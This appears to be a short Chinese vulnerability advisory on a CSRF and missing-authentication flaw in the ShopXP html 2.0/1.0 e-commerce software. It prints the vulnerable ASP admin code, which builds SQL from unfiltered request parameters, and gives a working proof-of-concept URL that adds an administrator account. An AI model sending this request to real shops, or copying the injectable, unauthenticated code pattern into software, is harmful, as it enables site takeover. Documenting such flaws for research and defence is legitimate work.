shopxp html版2.0 CSRF漏洞
- 发表于
- Vulndb
发布时间:2010-10-12
影响版本:shopxp html版2.0/1.0
漏洞描述:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
<!--#include file="xp.asp"--> <% dim adminid,action action=request.QueryString("action") adminid=request.QueryString("id") if adminid="" then adminid=request("adminid") select case action case "save" set rs=server.CreateObject("adodb.recordset") rs.Open "select * from [shopxp_admin] where adminid="&adminid,conn,1,3 ……………………………… rs.Update rs.Close set rs=nothing response.Write "<script language=javascript>alert('操作成功!');history.go(-1);</script>" case "del" conn.execute "delete from [shopxp_admin] where adminid in ("&adminid&") " 'response.Redirect "manageuser.asp" response.Redirect request.servervariables("http_referer") end select > |
调用的xp.asp:
|
1 2 3 4 5 6 7 8 9 10 11 |
<!--#include file="database_name.asp" --> <% dim conn,connstr,db startime=timer() db="../shopxp/"&dataname&"" '数据库 on error resume next '尝试连数据库,一直到超时,但可以加强SQL注入过滤 connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db) 'connstr="DBQ="+server.mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};" set conn=server.createobject("ADODB.CONNECTION") conn.open connstr > |
嘿嘿,也是未做过滤和验证的,那么就产生了个直接添加管理员的漏洞。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
|
1 |
http://127.0.0.1:99/admin/savexpadmin.asp?action=add&admin2=qing&password2=qing520&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1 |
其中的admin2和password2是要添加的管理员的用户名和密码
安全建议:
官方暂无相关补丁
请关注官方更新http://www.010net.cn/
原文连接:shopxp html版2.0 CSRF漏洞
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
